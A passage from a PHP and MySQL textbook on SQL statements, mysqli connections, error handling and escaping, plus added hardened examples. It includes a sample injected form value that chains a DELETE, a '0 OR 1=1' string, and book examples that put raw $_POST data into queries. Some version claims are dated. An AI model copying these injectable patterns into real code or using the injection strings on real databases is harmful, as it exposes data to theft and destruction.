different rows: 


Name     Type    Name     Color
T-shirt  Shirt   T-shirt  white
T-shirt  Shirt   T-shirt  red
<NULL>   <NULL>  Loafer   black


Notice that these results contain all the rows for the Color table on the 
right but not for the Product table. Notice the blanks in the columns for the 
Product table, which doesn’t have a row for Loafer.

The joins that we have discussed so far find matching entries in tables. Sometimes
it’s useful to find out which rows in a table have no matching entries in 
another table. For example, suppose that you want to know who has never 
logged in to your Members Only section. Suppose you have one table with 
the member’s login name (Member) and another table with the login dates 
(Login). You can ask this question by selecting from the two tables. You 
can find out which login names don’t have an entry in the Login table with 
the following query: 

SELECT Member.loginName FROM Member LEFT JOIN Login
ON Member.loginName=Login.loginName
WHERE Login.loginName IS NULL

This query gives you a list of all the login names in the Member table that
aren’t in the Login table.


Updating Information in a Database 

Changing information in an existing row is updating the information. For 
instance, you might need to change the address of a customer because she 
moved, or you might need to add a fax number that a customer left blank 
when he originally entered his information. 

The UPDATE statement is straightforward: 

UPDATE tablename SET column=value,column=value,...
WHERE clause

In the SET clause, you list the columns to be updated and the new values to
be inserted. List all the columns that you want to change in one statement.
Without a WHERE clause, the values of the column(s) would be changed in all
rows. But with the WHERE clause, you can specify which rows to update. For
instance, to update an address in the Customer table, use this statement:

UPDATE Customer SET street="3423 RoseLawn",
phone="555-555-5555"
WHERE lastName="Contrary"

Removing Information from a Database

Keep the information in your database up to date by deleting obsolete
information. However, be very careful when removing information. After you
drop the data, it’s gone forever. It cannot be restored. You only get it back if
you enter it all again.

You can remove a row or a column from a table, or you can remove the 
entire table or database and start over. 

You can remove a row from a table with the DELETE statement:

DELETE FROM tablename WHERE clause

Be extremely careful when using DELETE. If you use a DELETE statement
without a WHERE clause, it will delete all the data in the table. We mean all
the data. We repeat, all the data. The data cannot be recovered. This function
of the DELETE statement is right at the top of our don’t-try-this-at-home list.

You can delete a column from a table by using the ALTER statement:

ALTER TABLE tablename DROP columnname

You can remove the entire table or database with

DROP TABLE tablename 

or 

DROP DATABASE databasename 


Chapter 5: Communicating with
the Database from PHP Scripts


In This Chapter 

Using PHP built-in functions to access MySQL 
Sending SQL queries to the MySQL server 
Understanding how to handle MySQL errors 
Using other helpful functions 
Changing functions from mysqli to mysql 


PHP and MySQL work well together, and this dynamic partnership is
what makes PHP and MySQL so attractive for web database application
development. Whether you have a database full of information that you 
want to make available to users (such as a product catalog) or a database 
waiting to be filled by users (for example, a customer database), PHP and 
MySQL work together to implement your application. 


This chapter describes accessing MySQL from PHP scripts. 


Knowing How MySQL and PHP Work Together

You interact with the database by passing messages to the MySQL server.
As explained in Chapter 1 of this minibook, the messages are composed in
the SQL language, a standard computer language understood by most
database management systems.

PHP doesn’t understand SQL, but it doesn’t need to: PHP just establishes a
connection with the MySQL server and sends the SQL message over the
connection. The MySQL server interprets the SQL message, follows the
instructions, and sends a return message that states its status and what it did (or
reports an error if it couldn’t understand or follow the instructions).

The PHP language provides functions that make communicating with MySQL 
extremely simple. You use PHP functions to send SQL queries to the database. 
You don’t need to know the details of communicating with MySQL; PHP 
handles the details. You only need to know the SQL queries and how to use 
the PHP functions. 






We describe the general syntax for SQL queries in Chapter 1 of this
minibook. Individual specific queries are described in detail where we describe
how to use MySQL for a specific purpose. For example, we describe how
to create MySQL accounts in Chapter 2 in this minibook, so the SQL query
for creating accounts is described at that location. On the other hand, we
describe how to retrieve data from a MySQL database in Chapter 4 in this
minibook, so the SQL query used for that purpose is described in detail in
that chapter.


PHP Functions That Communicate with MySQL

PHP provides two sets of functions for communicating with MySQL — the
mysql functions and the mysqli (MySQL Improved) functions. Which
functions you use depends on the version of MySQL and PHP you’re using.

The mysqli functions were added in PHP 5 for use with MySQL versions 4.1 
and later. If you’re using a web hosting company, you need to know whether 
it offers PHP 5, which version of MySQL it provides, and whether it makes 
the mysqli functions available. In this book, we assume that you’re using 
PHP 5 or later, MySQL 5.0, and the mysqli functions. If your web host doesn’t 
offer the mysqli functions, you need to convert the mysqli functions in this 
book to mysql functions. The section “Converting mysqli Functions to mysql 
Functions,” later in this chapter, explains the differences. 

If you installed PHP and MySQL yourself on your own computer planning to 
develop your PHP scripts locally and upload the finished scripts to your web 
hosting company, you need to install the same versions and activate the same 
MySQL support functions that your web host provides. Otherwise, if you 
install different versions, even newer ones, the scripts may not behave in the 
same way on your web host’s computer as they do on your local computer. 

You can find a discussion of the issues about and instructions for installing 
your web development environment in Book 1. 


Communicating with MySQL

This chapter describes accessing MySQL from PHP scripts. (Accessing 
MySQL databases outside of PHP scripts is discussed in Chapters 1-4 
in this minibook.) SQL queries are sent to MySQL using PHP functions. 
Communicating with MySQL involves the following steps: 

1. Connect to the MySQL server.

2. Send the SQL query.

In this section, we tell you how to do both steps, and we tell you how to
send multiple queries.

Connecting to the MySQL server

Before you can store or get any data, you need to connect to the database, 
which might be on the same computer as your PHP scripts or on a different 
computer. You don’t need to know the details of connecting to the database 
because PHP handles the details. All you need to know is the name and
location of the database, along with a username and password to access it. Think
of a database connection in the same way that you think of a telephone
connection. You don’t need to know the details about how the connection
is made — that is, how your words move from your telephone to another
telephone — you need to know only the area code and phone number. The
phone company handles the details.

To connect to the MySQL server, you need to know the name of the
computer on which the database is located and your MySQL account’s user ID
and password. For most queries, you also need to know the name of the
database with which you want to interact.

To open the connection, use the mysqli_connect function:

$cxn = mysqli_connect("host","acct","password","dbname")
or die("message");

Fill in the following information: 




♦ host: The name of the computer on which MySQL is installed — for
example, databasehost.example.com. If the MySQL database is on
the same computer as your website, you can use localhost as the
computer name. If you leave this information blank (""), PHP assumes
localhost.

♦ acct: The name of any valid MySQL account. (We discuss MySQL
accounts in detail in Chapter 2 of this minibook.)

♦ password: The password for the MySQL account specified by acct.
If the MySQL account doesn’t require a password, don’t type anything
between the quotes: "".

♦ dbname: The name of the database with which you want to communicate.
This parameter is optional — you can select the database later, with a
separate command, if you prefer. You can select a different database at
any point in your script.

If you’re using the mysql functions, you can’t select the database in
the connect function. You must use a separate function — mysql_select_db —
to select the database.

♦ message: The message sent to the browser if the connection fails. The
connection fails if the computer or network is down, or if the MySQL server
isn’t running. It also may fail if the information provided isn’t correct —
for example, if the password contains a typo.

You might want to use a descriptive message during development,
such as Couldn't connect to server, but a more general message
suitable for customers after you put the application in use, such as
The Catalog is not available at the moment. Please try
again later.



The host includes a port number that’s needed for the connection. Almost
always, the port number is 3306. On rare occasions, the MySQL administrator
needs to set up MySQL so that it connects on a different port. In these cases,
the port number is required for the connection. The port number is specified
as hostname:portnumber. For instance, you might use localhost:8808.


With these statements, mysqli_connect attempts to open a connection
to the named computer, using the account name and password provided.
If the connection fails, the script stops running and sends message to the
browser.


The following statement connects to the MySQL server on the local computer, 
using a MySQL account named phpuser that doesn’t require a password: 

$cxn = mysqli_connect("localhost","phpuser","","Customer")
or die ("Couldn't connect to server.");

For security reasons, you should store the connection information in
variables and use the variables in the connection statement, as follows:

$host="localhost";
$user="phpuser";
$password="";
$dbname = "Customer";
$cxn = mysqli_connect($host,$user,$password,$dbname)
or die("Couldn't connect to server.");

For even more security, you can put the assignment statements for the
connection information in a separate file in a hidden location so that the account
name and password aren’t even in the script. You insert the account
information from the file by using an include statement, as described in Book
IV, Chapter 2.

The variable $cxn contains information that identifies the connection. You 
can have more than one connection open at a time by using more than one 
variable name. 

A connection remains open until you close it or until the script ends. You
close a connection as follows:

mysqli_close($connectionname);

For instance, to close the connection in the preceding example, use this
statement:

mysqli_close($cxn);

Sending an SQL statement 

After you have an open connection to the MySQL server, you send your SQL 
statement query. You can find details of the SQL statements and queries that 
you need for specific purposes in the other chapters in this minibook. 

To interact with the database, put your SQL statement into a variable and 
send it to the MySQL server with the function mysqli_query, as in the
following example:

$query = "SELECT * FROM Customer";
$result = mysqli_query($cxn,$query)
or die ("Couldn't execute query.");

The query is executed on the currently selected database for the specified 
connection. 

The variable $result holds information on the result of executing the query 
but not the actual results. The information in $result depends on whether 
or not the query gets information from the database: 

♦ For queries or statements that don’t get any data: The variable
$result contains information about whether the query or statement
executed successfully or not. If it’s successful, $result is set to true;
if it’s not successful, $result is set to false. Some queries and
statements that don’t return data are INSERT and UPDATE.

♦ For queries that return data: The variable $result contains a result
identifier that specifies where the returned data is located, not the
returned data itself. Some queries that return data are SELECT and
SHOW.

The use of single and double quotes can be a little confusing when assigning 
the query or statement to the $query variable. You’re actually using quotes 
on two levels: the quotes that assign the string to $query and the quotes
that are part of the SQL language itself. The following guidelines can help
you avoid any problems with quotes when working with SQL:

♦ Use double quotes at the beginning and end of the string.

♦ Use single quotes before and after variable names.

♦ Use single quotes before and after literal values.

The following statements show examples of assigning SQL strings to
variables in PHP:


$query = "SELECT firstName FROM Customer"; 

$query = "SELECT firstName FROM Customer WHERE lastName='Smith'"; 
$query = "UPDATE Customer SET lastName='$last_name'"; 



The SQL statement itself doesn’t include a semicolon (;), so don’t put a 
semicolon inside the final quote. The only semicolon appears at the very 
end, as shown in the previous examples; this is the PHP semicolon that ends 
the statement. 


Sending multiple queries

Sometimes, you want to send two or more queries at the same time. MySQL
allows you to do so, but you need to use a different function to send the
queries. You can send multiple queries with the following function:

mysqli_multi_query($cxn,$query)

You send the queries in a single string with the queries separated by a
semicolon:

$query = "SELECT * FROM Cust;SELECT * FROM OldCust";
mysqli_multi_query($cxn,$query);

The mysqli_multi_query function isn’t available with the mysql functions, only
with the mysqli functions.

Sending multiple queries can be less secure than sending one query. Whenever you
use data from an outside source, be sure you validate the outside data
thoroughly. For instance, suppose you display a form asking the user for a table
name, and you create a query from the table name that the user enters, as
follows:

$query = "SELECT * FROM Friend";

The user enters the table name Friend. The query is fine. However,
suppose the user enters the following into the form:


Friend;DELETE TABLE Friend 




Your query then is

$query = "SELECT * FROM Friend;DELETE TABLE Friend";

If you send this query, the query is not so fine. You won’t like the results.
You probably didn’t want the table deleted. Be sure to always sanitize data
before sending it to MySQL!

Selecting a database

If you don’t select the database in the connect function, you can select the
database by using the mysqli_select_db function. You can also use this
function to select a different database at any time in your script. The format is

mysqli_select_db($cxn,"databasename")
or die ("message");



If you’re using the mysql functions, rather than the mysqli functions, you 
must select the database in a separate function, using mysql_select_db. 
The section “Converting mysqli Functions to mysql Functions,” later in this 
chapter, explains in more detail. 


Fill in the following information: 


♦ cxn: The variable that contains the connection information.

♦ databasename: The name of the database. 

♦ message: The message that’s sent to the browser if the database can’t 
be selected. The selection might fail because the database can’t be 
found, which is usually the result of a typo in the database name. 


For instance, you can select the database Customer with the following 
statement: 


mysqli_select_db($cxn,"Customer")
or die ("Couldn't select database.");

If mysqli_select_db can’t select the database, the script stops running
and the message Couldn't select database. is sent to the browser.

The database stays selected until you select a different database. To select a
different database, just use a new mysqli_select_db function statement.


Handling MySQL Errors

You use the mysqli functions of the PHP language, such as mysqli_connect
and mysqli_query, to interact with the MySQL database. Things will
sometimes go wrong when you use the statements. You may make an error in
your typing, such as mistyping a database name. Sometimes, problems arise
that you can’t avoid, such as the database or the network being down. You
need to include code in your script that handles error situations.

You can read about PHP error handling in Book IV, Chapter 1. That chapter 
describes the types of errors that PHP displays and how to turn them on and 
off. As discussed in Book IV, you usually want to make your error handling 
more descriptive to assist with troubleshooting problems during development, 
but you don’t want the extra information displayed to the public. 

For instance, suppose that you’re using an account called root to access 
your database and you make a typo, as in the following statements: 

$host = "localhost";
$user = "rot";
$password = "";
$cxn = mysqli_connect($host,$user,$password);

Because you type "rot" rather than "root", you see a warning message
similar to this one:

Warning: Access denied for user: 'rot@localhost' (Using
password: NO) ...

The preceding error message contains the information that you need to 
figure out the problem — it shows your account name that includes the 
typo. However, after your script is running and customers are using it, you 
don’t want your users to see a technical error message that shows your user 
ID. You want to turn the PHP errors off or send them to an error log file. You 
could then use a die statement to stop the script and display a polite
message to the user, as follows:

$cxn = mysqli_connect($host,$user,$password)
or die("The Catalog is not available at the moment. Please
try again later.");

When a mysqli_query() function fails, MySQL returns an error message
that contains information about the cause of the failure. However, this
message isn’t displayed unless you specifically display it. Again, you may want
to see these messages when you’re developing the script, but you may not
want to display them to the public. You can display the MySQL error that’s
returned by using the following function:

mysqli_error($cxn)

For example, you might include the function in your code, as follows:

$query = "SELECT * FROM Cust";
$result = mysqli_query($cxn,$query)
or die ("Error: ".mysqli_error($cxn));

In this example, if the function call fails, the die statement displays the 
MySQL error, which might be something like this: 

Error: Table 'catalog.cust' doesn't exist 

Occasionally, you may want to perform additional actions if the function 
fails, such as delete variables or close the database connection. You can
perform such actions by using a conditional statement:

if(!$result = mysqli_query($cxn,$query))
{
   echo mysqli_error($cxn);
   unset($auth);
   exit();
}

If the function call fails, the statements in the if block are executed. The
echo statement displays the MySQL error returned by the function. A
variable is removed, and the script exits.

Notice the ! (exclamation point) in the if statement. ! means "not". In 
other words, the if statement is true if the assignment statement is not true. 
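
The two pieces of advice above (keep the account details in a separate file, and keep MySQL error text away from visitors) combined in an added example that is not from the book. The file path, the array keys and the function names are assumptions. Since PHP 8.1, mysqli throws exceptions by default, so a failed call never reaches an or die clause; the example catches the exception instead.

```php
<?php
// Added example, not from the book. Assumed layout: a PHP file kept outside
// the web server's document root (the path passed in is a placeholder) that
// returns the connection settings as an array, for example:
//   return ['host' => 'localhost', 'user' => 'phpuser',
//           'password' => '', 'dbname' => 'Customer'];

const PUBLIC_MESSAGE =
    'The Catalog is not available at the moment. Please try again later.';

/** Log the technical detail on the server; show visitors a generic message. */
function fail_politely(string $where, Throwable $e, int $status): void
{
    // The MySQL message (account name, host, table names) goes to PHP's
    // error log only, never into the page.
    error_log("$where: " . $e->getMessage());
    http_response_code($status);
    exit(PUBLIC_MESSAGE);
}

/** Open the connection described by $configFile, or stop politely. */
function open_db(string $configFile): mysqli
{
    $cfg = require $configFile;

    // Throw mysqli_sql_exception on every failure (the default since PHP 8.1),
    // so an error cannot be silently ignored.
    mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);
    try {
        $cxn = mysqli_connect(
            $cfg['host'], $cfg['user'], $cfg['password'], $cfg['dbname']
        );
        // Fix the connection character set; mysqli_real_escape_string()
        // relies on it. utf8mb4 assumes MySQL 5.5.3 or later.
        mysqli_set_charset($cxn, 'utf8mb4');
        return $cxn;
    } catch (mysqli_sql_exception $e) {
        fail_politely('DB connect failed', $e, 503);
    }
}

/** Run one statement; on failure log the MySQL error instead of echoing it. */
function run_query(mysqli $cxn, string $query)
{
    try {
        return mysqli_query($cxn, $query);
    } catch (mysqli_sql_exception $e) {
        fail_politely('Query failed', $e, 500);
    }
}

// Usage (the path is a placeholder):
// $cxn    = open_db('/path/outside/webroot/dbvars.inc');
// $result = run_query($cxn, "SELECT * FROM Customer");
```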


Using Other Helpful mysqli Functions

Other useful mysqli functions are available for you to use in your PHP scripts.
The following subsections describe how to use mysqli functions to count the
number of rows returned by a query, determine the last automatically made
entry, count rows affected by a query, and escape characters.


Counting the number of rows returned by a query

Often, you want to know how many rows your SQL query returned. Your
query specifies criteria that the information must meet to be returned, such
as state must equal TX or lastName must equal Smith. The function
mysqli_num_rows tells you how many rows were found that meet the
criteria.

Login pages frequently use this function. When a user attempts to log in, 
he or she types a username and a password into an HTML form. Your PHP 
script then checks for the username and password in a database. If it is 
found, the username and password are valid. You might use code similar to
the following:

$query = "SELECT * FROM ValidUser
          WHERE acct = '$_POST[userID]'
          AND password = '$password'";
$result = mysqli_query($cxn,$query);
$n = mysqli_num_rows($result);
if($n < 1)
{
   echo "User name and password are not valid";
   exit();
}

In this code, the SQL query looks for a row with the username (called acct
in this example) and password provided by the user in the form. The code 
then tests the query result to see how many rows it contains. If the result 
doesn’t contain any rows, that is less than one row, a user with the provided 
username and password doesn’t exist in the database, and thus, the account 
information is not valid and the user is not allowed to log in. 
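
A hardened form of this login check, as an added example that is not the book's code. It sends the form value as a bound parameter instead of placing it in the SQL text, and verifies the password against a stored hash rather than comparing it in the WHERE clause. The passwordHash column, the password form field and the function names are assumptions; ValidUser, acct and userID come from the code above.

```php
<?php
// Added example, not from the book. Assumes ValidUser has a passwordHash
// column (hypothetical name) filled by password_hash() at registration,
// and that $cxn is an open mysqli connection.

/** Return true only if $acct exists and $password matches its stored hash. */
function check_login(mysqli $cxn, string $acct, string $password): bool
{
    // The ? placeholder is filled in by MySQL, so quotes or semicolons in
    // $acct are treated as data and can never change the query itself.
    $stmt = mysqli_prepare(
        $cxn,
        "SELECT passwordHash FROM ValidUser WHERE acct = ? LIMIT 1"
    );
    if ($stmt === false) {
        // Only reached when mysqli is not in exception mode (before PHP 8.1).
        error_log('check_login: prepare failed: ' . mysqli_error($cxn));
        return false;
    }
    mysqli_stmt_bind_param($stmt, 's', $acct);

    $hash  = null;
    $found = false;
    if (mysqli_stmt_execute($stmt)) {
        mysqli_stmt_bind_result($stmt, $hash);
        // fetch returns true for a row, null when no row matched.
        $found = (mysqli_stmt_fetch($stmt) === true);
    } else {
        error_log('check_login: execute failed: ' . mysqli_stmt_error($stmt));
    }
    mysqli_stmt_close($stmt);

    if (!$found || !is_string($hash)) {
        return false;
    }
    // The typed password is compared with the hash in PHP, so the
    // database never needs to hold or receive a readable password.
    return password_verify($password, $hash);
}

/** Validate the raw form fields before they reach check_login(). */
function login_from_post(mysqli $cxn, array $post): bool
{
    $acct     = $post['userID']   ?? null;
    $password = $post['password'] ?? null;   // assumed form field name
    // Reject missing fields and array-valued fields (userID[]=...).
    if (!is_string($acct) || !is_string($password) || $acct === '') {
        return false;
    }
    return check_login($cxn, $acct, $password);
}

// Usage in the login script:
// if (!login_from_post($cxn, $_POST)) {
//     echo "User name and password are not valid";
//     exit();
// }
```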

Determining the last auto entry

Many database tables contain an AUTO_INCREMENT field. This is a serial
field in which MySQL adds the field value automatically. When a row is
added, MySQL gives the AUTO_INCREMENT field the next serial value after
the preceding row. Such fields are often defined as a unique identifier or
primary key for a table.

Because MySQL adds the auto value, you do not necessarily know which 
value was stored in the field for the new row. In some situations, you need 
to know what the number was so that you can use it later in the script. The 
function mysqli_insert_id returns the number that was last added to an 
AUTO_INCREMENT field. 

One situation in which you need to know the number MySQL stored in the 
field is when you store an order and order items in separate tables. For 
example, if you define the orderID field as an AUTO_INCREMENT field,
MySQL adds the number to the orderID field. However, you need to store
this number in the OrderItem table so that you can connect the items to
the order. You might use code similar to the following:

$query = "INSERT INTO CustomerOrder (customerID,orderDate)
          VALUES ($customerID,'$date')";
$result = mysqli_query($cxn,$query);
$orderID = mysqli_insert_id($cxn);
$query = "INSERT INTO OrderItem (orderID,color,size,price)
          VALUES ($orderID,'$color','$size',$price)";
$result = mysqli_query($cxn,$query);

In the first query, orderID is not specified, so MySQL stores the next serial
number in that field. In the second query, the orderID inserted in the
previous query is inserted into the second table.

Counting affected rows

Some SQL queries change the database, but don’t return any data. For instance,
an UPDATE query can change the data in a table, but it doesn’t return any
data. In this case, an UPDATE statement may affect one, many, or zero rows.
For instance, the following is an UPDATE statement:

$stmt = "UPDATE Customer SET lastName = 'Smyth'
         WHERE lastName = 'Smith'";

This statement will change any last names in the table with the value Smith
to Smyth.

In some cases, you may need to know how many rows were changed by the
statement. In this example, there may be no one in the database with the
name Smith or there may be hundreds. You can find out how many rows
were updated with the mysqli_affected_rows function. This function
returns the number of rows that were affected by the last UPDATE, INSERT,
REPLACE, or DELETE statement.

Suppose you want to set a field in a table that identifies students who passed 
a test. You might also want to know how many of the students passed. You 
might use code similar to the following: 

$query = "UPDATE Student SET status='pass' WHERE score > 50"; 
$result = mysqli_query($cxn,$query); 

$passed = mysqli_affected_rows($cxn); 
echo "$passed students passed"; 

In this code, any student in the table whose score is higher than 50 passed 
the test. The variable $passed contains the number of students whose 
score was high enough for their status field to be updated to "pass".

Escaping characters 

When you store any string information in your database, you need to escape 
special characters. This is an essential security measure. 

PHP versions before version 6 provide a feature called magic quotes that 
automatically escapes all strings in the $_POST and $_GET arrays. Single
quotes, double quotes, backslashes, and null characters are escaped. This
feature, designed to help beginning users, is controlled by the
magic_quotes_gpc setting in php.ini and is turned on by default in PHP 4 and
PHP 5. In PHP 6, the magic quotes feature is no longer available.

The magic quotes feature results in a great deal of inefficient, unnecessary
escaping. It also results sometimes in undesirable escaping. In general, we
recommend you turn off magic quotes in your php.ini file. Making changes
to the php.ini is discussed in more detail in Book IV, Chapter 1.

Because it is essential that you escape your data before storing it, if the magic
quotes feature is turned off, you must escape your data manually. The function
mysqli_real_escape_string is provided for this purpose. Before storing
any data in a database, apply the function to it. The following lines show some
possible code that escapes data so it is safe to store in a database:

$lastName = mysqli_real_escape_string($cxn,$lastName);

$lastName = mysqli_real_escape_string($cxn,$_POST['lastName']);
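
What escaping does and does not cover, as an added example that is not from the book. mysqli_real_escape_string only protects a value that ends up between quotes, so the table name from the form in "Sending multiple queries" needs a fixed list of permitted names, and an unquoted number needs an integer check. The function names and the choice of listable tables are assumptions; the table and column names come from this chapter.

```php
<?php
// Added example, not from the book. $cxn is an open mysqli connection.

// Tables a visitor may list (assumed choice; the names are from this chapter).
const LISTABLE_TABLES = ['Friend', 'Member', 'OldMember'];

/**
 * Identifier context: a table name cannot be escaped into safety, so it is
 * accepted only when it is exactly one of our own names.
 */
function select_all_from(mysqli $cxn, $requested)
{
    if (!is_string($requested)
        || !in_array($requested, LISTABLE_TABLES, true)) {
        return false;   // "Friend;DELETE TABLE Friend" ends up here
    }
    // mysqli_query() sends a single statement; mysqli_multi_query() is not
    // needed here and is best kept away from anything built from input.
    return mysqli_query($cxn, "SELECT * FROM `$requested`");
}

/**
 * String context: escape the value AND keep it inside single quotes.
 * Returns the number of rows changed, or false on failure.
 */
function rename_customer(mysqli $cxn, string $old, string $new)
{
    $old = mysqli_real_escape_string($cxn, $old);
    $new = mysqli_real_escape_string($cxn, $new);
    $query = "UPDATE Customer SET lastName='$new' WHERE lastName='$old'";
    if (!mysqli_query($cxn, $query)) {
        return false;
    }
    return mysqli_affected_rows($cxn);
}

/**
 * Numeric context: the value is not quoted, so escaping does nothing useful
 * ("0 OR 1=1" contains no character to escape). Require a real integer.
 */
function orders_for_customer(mysqli $cxn, $customerID)
{
    $id = filter_var(
        $customerID,
        FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]
    );
    if ($id === false) {
        return false;
    }
    return mysqli_query(
        $cxn,
        "SELECT orderID,orderDate FROM CustomerOrder WHERE customerID = $id"
    );
}

// Usage with form input (field names are assumptions):
// $rows = select_all_from($cxn, $_POST['table'] ?? null);
// $n    = rename_customer($cxn, 'Smith', "O'Hara");   // quote is escaped
// $list = orders_for_customer($cxn, $_GET['customerID'] ?? null);
```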


Converting mysqli Functions to mysql Functions

This book assumes you’re using PHP 5 or later with the mysqli functions
to interact with MySQL 5.0 or 5.1. If you’re using PHP 4, the mysqli functions
aren’t available. Instead, you use the mysql functions, even with later versions
of MySQL. The mysql functions can communicate with the later versions of
MySQL, but they can’t access some of the new features added in the later
versions of MySQL. The mysql functions are activated automatically in PHP 4.

Throughout this book, the examples and scripts use MySQL 5.0 and the 
mysqli functions to communicate with MySQL. The PHP functions for use 
with MySQL 5.0 have the following general format: 


mysqli_function(value,value,...);


The i in the function name stands for improved (MySQL Improved). The 
second part of the function name is specific to the function, usually a word 
that describes what the function does. In addition, the function usually 
requires one or more values to be passed, specifying details such as the 
database connection or the data location. Here are two of the mysqli
functions discussed earlier in this chapter:

mysqli_connect(connection information);
mysqli_query($cxn, "SQL statement");

The corresponding mysql functions are 

mysql_connect(connection information);
mysql_query("SQL statement", $cxn);

The functionality and syntax of the functions are similar, but not identical, 
for all functions. In particular, mysqli functions use a different process for 
connecting to the MySQL server than mysql functions do. The format of the
mysqli function is

mysqli_connect($host,$user,$password,$dbname);

The connection process for mysql functions requires two function calls:

mysql_connect($host,$user,$password);
mysql_select_db($dbname);

If you need to use the mysql functions, rather than the mysqli functions,
you need to edit the scripts in this book, replacing the mysqli functions with
mysql functions. Table 5-1 shows mysqli function syntax and their
equivalent mysql function syntax.


Table 5-1 Syntax for mysql and mysqli Functions

mysqli Function                              mysql Function
-------------------------------------------  -------------------------------------------
mysqli_connect($host,$user,$passwd,$dbname)  mysql_connect($host,$user,$passwd)
                                             followed by mysql_select_db($dbname)
mysqli_errno($cxn)                           mysql_errno() or mysql_errno($cxn)
mysqli_error($cxn)                           mysql_error() or mysql_error($cxn)
mysqli_fetch_array($result)                  mysql_fetch_array($result)
mysqli_fetch_assoc($result)                  mysql_fetch_assoc($result)
mysqli_fetch_row($result)                    mysql_fetch_row($result)
mysqli_insert_id($cxn)                       mysql_insert_id($cxn)
mysqli_num_rows($result)                     mysql_num_rows($result)
mysqli_query($cxn,$sql)                      mysql_query($sql) or mysql_query($sql,$cxn)
mysqli_select_db($cxn,$dbname)               mysql_select_db($dbname)
mysqli_real_escape_string($cxn,$data)        mysql_real_escape_string($data)
Chapter 1: Improving Your PHP
Programs


In This Chapter 

Including helpers automatically 
Reusing code 


In earlier chapters, you’ve seen how to program in PHP. You’ve seen how
to create a program, how to loop, set up conditionals, and more. All of 
that knowledge has enabled you to create PHP programs that work well on 
the web. But you can make them even better, even easier to use, and that’s 
what this chapter is all about. 


In this chapter you’ll see how to improve and extend your PHP programs 
and how to create and use helper functions automatically. You’ll also see 
ways to reuse code rather than reinventing it every time you need it. 


Automatically Including Helper Functions

Once your programs reach a certain length and complexity, you find that 
there are a lot of includes and require_once() functions. Each time you
make a new file or try to make something into a common function, you also 
need to go back through all the programs and add a new require_once. 
That can quickly become monotonous. Luckily, there’s a way around it. 

Using auto_prepend_file

You can automatically prepend a PHP file so that its code is executed before
the actual file being requested. In other words, if you send a visitor to a URL
similar to http://www.example.com/login.php, you can use
auto_prepend_file to always require a helper file prior to the login.php code
being run. That helper file could start the session, provide several functions
that are used within your programs, or even load other files.

The auto_prepend_file directive is part of your php.ini file, but it’s
more common to set it in the Apache configuration using the php_value
directive, like so:

<Directory "/my/documentroot/path">

php_value auto_prepend_file "/my/documentroot/path/prependfile.php"

</Directory>

The file included with auto_prepend_file is included as if the require()
function was used. The practical implication is that, if the file
being prepended is not found, an error will occur and the program won’t
continue.


Starting sessions with a prepended file

You learn about sessions in Book IV, Chapter 6. That chapter explains that
in order to use sessions, you need to call the session_start() function
on every page that will use sessions. This can be cumbersome, especially if
you’re trying to tack sessions onto several PHP programs. You can use an
auto_prepend_file to call session_start and, in doing so, you don’t
have to change any other files!



In the following exercise, you create two files: one that will be the main file
and another containing a prepended function to start a session. Prior to
performing this exercise, you should ensure that .htaccess files work or that
you can alter your Apache web server configuration.

Be sure to restart Apache if you make a change to the configuration. 

Within the .htaccess file for your document root, place the following code: 


php_value auto_prepend_file "prepend.php"



Alternatively, you can add that line within the <Directory> stanza in
the Apache configuration for your web server for your document root.

For example, if your document root is "/var/www" you can add that line
after the <Directory "/var/www"> directive and before the closing
</Directory> line in the Apache config.

See www.javascriptkit.com/howto/htaccess.shtml for more
information on .htaccess files.
Open your text editor and create a new empty file. Within the file, place the
following code:

<?php

if (isset($_SESSION)) {
    print "Session has started!";
} else {
    print "Session has not started";
}

?>

Save the file as session.php within your document root.

Open a web browser and point to http://localhost/session.php. You
should see a page like the one in Figure 1-1.
Minimize the web browser and create a new file within your text editor.
Within that file place the following code:

<?php

session_start();

?>

Save the file as prepend.php in your document root.

Within your web browser, reload the session.php file or go to
http://localhost/session.php to view the session.php file you created
earlier. You should now see a page like the one in Figure 1-2.
Figure 1-2: Verifying that the file has been prepended.




If you receive a blank page or an error displayed through the browser, then
the prepended file wasn’t found. Check the simple stuff, like spelling of the
file (prepend.php). Also check to make sure that the file you called with
the auto_prepend_file directive is where it should be, in the document
root if that’s how your web server is configured.


If you receive a page that still says “Session has not started,” then there’s a
chance that Apache isn’t seeing your auto_prepend_file directive at all.
If you’ve placed it in an .htaccess file in your document root, you need to
make sure that Apache is reading the .htaccess file. Continue reading or
check with your hosting provider to see if .htaccess files are allowed.


Some web server configurations don’t allow for .htaccess files. You can
reconfigure Apache to allow them by changing the AllowOverride directive
to All for the directory from which you want to read the .htaccess file (in
this case, your document root). The directive should look like this:

AllowOverride All 


Prepended files can be incredible helpers, but they also can sometimes 
cause confusion. For example, if you aren’t sure why a program is doing 
something, an auto-prepended file can sometimes add to that confusion 
because it loads so many other files and functions — adding ample room for 
error. Additionally, every request must now use that auto-prepended file, 
which can cause performance issues if you chain too many required and 
included files from that prepended file. With that said, the benefits usually 
outweigh the drawbacks for prepended files. 
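
Because every request passes through the prepended file, it is also the one place to set how the session cookie is issued. The following prepend.php is an added example, not the book's code; it assumes PHP 7.3 or later, and SESSION_IDLE_LIMIT, startHardenedSession, and markLoggedIn are hypothetical names. Keeping the file outside the document root and naming it by absolute path in auto_prepend_file stops visitors from requesting it directly.

```php
<?php
// prepend.php: added example, not the book's code.
// Assumption: PHP 7.3 or later (array form of session_set_cookie_params).

const SESSION_IDLE_LIMIT = 1800; // constructed value: seconds of inactivity allowed

function startHardenedSession()
{
    if (session_status() !== PHP_SESSION_NONE) {
        return; // a session is already active, or sessions are disabled
    }

    // Accept only session IDs this server issued, and only from the cookie.
    ini_set('session.use_strict_mode', '1');
    ini_set('session.use_only_cookies', '1');

    // Mark the cookie Secure whenever the request arrived over HTTPS, so the
    // http://localhost exercise on this page keeps working.
    $https = !empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off';
    session_set_cookie_params(array(
        'lifetime' => 0,        // expire when the browser closes
        'path'     => '/',
        'secure'   => $https,
        'httponly' => true,     // not readable from JavaScript
        'samesite' => 'Lax',
    ));
    session_start();

    // Idle timeout: discard the data and the old ID after a long gap.
    $now = time();
    if (isset($_SESSION['lastSeen'])
        && $now - $_SESSION['lastSeen'] > SESSION_IDLE_LIMIT) {
        $_SESSION = array();
        session_regenerate_id(true);
    }
    $_SESSION['lastSeen'] = $now;
}

// Hypothetical helper for a login script: swap the session ID at the moment
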